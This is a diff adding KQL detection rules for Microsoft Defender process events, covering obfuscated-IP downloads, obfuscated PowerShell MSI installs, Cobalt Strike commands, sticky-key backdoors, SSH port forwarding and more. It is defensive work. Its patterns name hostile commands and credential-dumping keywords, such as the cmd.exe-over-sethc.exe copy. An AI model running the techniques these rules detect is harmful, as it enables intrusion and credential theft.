+// Title: Obfuscated IP Download Activity
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql b/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql
new file mode 100644
index 00000000..f664129c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated IP Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
new file mode 100644
index 00000000..68f83ce2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
@@ -0,0 +1,14 @@
+// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-05-27
+// Level: high
+// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
+// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
+// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
+// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
+// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(" and ProcessCommandLine contains ".Insert(" and ProcessCommandLine contains "UILevel") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql
new file mode 100644
index 00000000..ce369ca5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated PowerShell OneLiner Execution
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-05-09
+// Level: high
+// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://127.0.0.1" and ProcessCommandLine contains "%{(IRM $_)}" and ProcessCommandLine contains "Invoke") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql
new file mode 100644
index 00000000..50efda01
--- /dev/null
+++ b/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql
@@ -0,0 +1,12 @@
+// Title: Odbcconf.EXE Suspicious DLL Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql
new file mode 100644
index 00000000..f7a4abcf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql
@@ -0,0 +1,13 @@
+// Title: OneNote.EXE Execution of Malicious Embedded Scripts
+// Author: @kostastsale
+// Date: 2023-02-02
+// Level: high
+// Description: Detects the execution of malicious OneNote documents that contain embedded scripts.
+// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\exported\\" or ProcessCommandLine contains "\\onenoteofflinecache_files\\") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\onenote.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql
new file mode 100644
index 00000000..f14437f7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql
@@ -0,0 +1,10 @@
+// Title: OpenWith.exe Executes Specified Binary
+// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
+// Date: 2019-10-12
+// Level: high
+// Description: The OpenWith.exe executes other binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql
new file mode 100644
index 00000000..5405e6ca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql
@@ -0,0 +1,10 @@
+// Title: Operator Bloopers Cobalt Strike Commands
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, stp.1u
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql
new file mode 100644
index 00000000..52be17aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql
@@ -0,0 +1,10 @@
+// Title: Operator Bloopers Cobalt Strike Modules
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql
new file mode 100644
index 00000000..49ff20b1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql
@@ -0,0 +1,10 @@
+// Title: Outlook EnableUnsafeClientMailRules Setting Enabled
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-12-27
+// Level: high
+// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql
new file mode 100644
index 00000000..244cfed8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: Password Provided In Command Line Of Net.EXE
+// Author: Tim Shelton (HAWK.IO)
+// Date: 2021-12-09
+// Level: medium
+// Description: Detects a when net.exe is called with a password in the command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql
new file mode 100644
index 00000000..1c952b92
--- /dev/null
+++ b/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql
@@ -0,0 +1,12 @@
+// Title: Password Set to Never Expire via WMI
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-07-30
+// Level: medium
+// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098
+// False Positives:
+//   - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "useraccount" and ProcessCommandLine contains " set " and ProcessCommandLine contains "passwordexpires" and ProcessCommandLine contains "false") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql
new file mode 100644
index 00000000..c14a54d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PDQ Deploy Remote Adminstartion Tool Execution
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detect use of PDQ Deploy remote admin tool
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/perl_inline_command_execution.kql b/KQL/rules/windows/process_creation/perl_inline_command_execution.kql
new file mode 100644
index 00000000..38753a5a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/perl_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Perl Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql b/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql
new file mode 100644
index 00000000..7ca0e464
--- /dev/null
+++ b/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql
@@ -0,0 +1,12 @@
+// Title: Permission Check Via Accesschk.EXE
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+//   - System administrator Usage
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..3e502fc9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,11 @@
+// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: medium
+// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
+// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql b/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql
new file mode 100644
index 00000000..589ba46e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql
@@ -0,0 +1,13 @@
+// Title: Persistence Via Sticky Key Backdoor
+// Author: Sreeman
+// Date: 2020-02-18
+// Level: critical
+// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
+// When the sticky keys are "activated" the privilleged shell is launched.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql b/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql
new file mode 100644
index 00000000..fc9bf38d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Persistence Via TypedPaths - CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: medium
+// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql b/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql
new file mode 100644
index 00000000..995ff0e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql
@@ -0,0 +1,12 @@
+// Title: Phishing Pattern ISO in Archive
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-07
+// Level: high
+// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566
+// False Positives:
+//   - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/php_inline_command_execution.kql b/KQL/rules/windows/process_creation/php_inline_command_execution.kql
new file mode 100644
index 00000000..18fd54fa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/php_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Php Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ping_hex_ip.kql b/KQL/rules/windows/process_creation/ping_hex_ip.kql
new file mode 100644
index 00000000..2c8c6cb8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ping_hex_ip.kql
@@ -0,0 +1,12 @@
+// Title: Ping Hex IP
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-23
+// Level: high
+// Description: Detects a ping command that uses a hex encoded IP address
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1027
+// False Positives:
+//   - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "0x[a-fA-F0-9]{8}" and FolderPath endswith "\\ping.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pktmon_exe_execution.kql b/KQL/rules/windows/process_creation/pktmon_exe_execution.kql
new file mode 100644
index 00000000..e4629826
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pktmon_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: PktMon.EXE Execution
+// Author: frack113
+// Date: 2022-03-17
+// Level: medium
+// Description: Detects execution of PktMon, a tool that captures network packets.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql
new file mode 100644
index 00000000..cc1278d9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql
@@ -0,0 +1,12 @@
+// Title: Port Forwarding Activity Via SSH.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: medium
+// Description: Detects port forwarding activity via SSH.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004
+// False Positives:
+//   - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R " or ProcessCommandLine contains " –R " or ProcessCommandLine contains " —R " or ProcessCommandLine contains " ―R ") and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql
new file mode 100644
index 00000000..70660e99
--- /dev/null
+++ b/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Portable Gpg.EXE Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-06
+// Level: medium
+// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql
new file mode 100644
index 00000000..0035caee
--- /dev/null
+++ b/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql
@@ -0,0 +1,10 @@
+// Title: Possible Privilege Escalation via Weak Service Permissions
+// Author: Teymur Kheirkhabarov
+// Date: 2019-10-26
+// Level: high
+// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sc.exe" and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql
new file mode 100644
index 00000000..f349e4b1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql
@@ -0,0 +1,12 @@
+// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation
+// Author: frack113
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.discovery, attack.impact
+// False Positives:
+//   - Legitimate use of the library for administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql
new file mode 100644
index 00000000..13d64694
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Adplus.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: high
+// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Legitimate usage of Adplus for debugging purposes
+
+DeviceProcessEvents
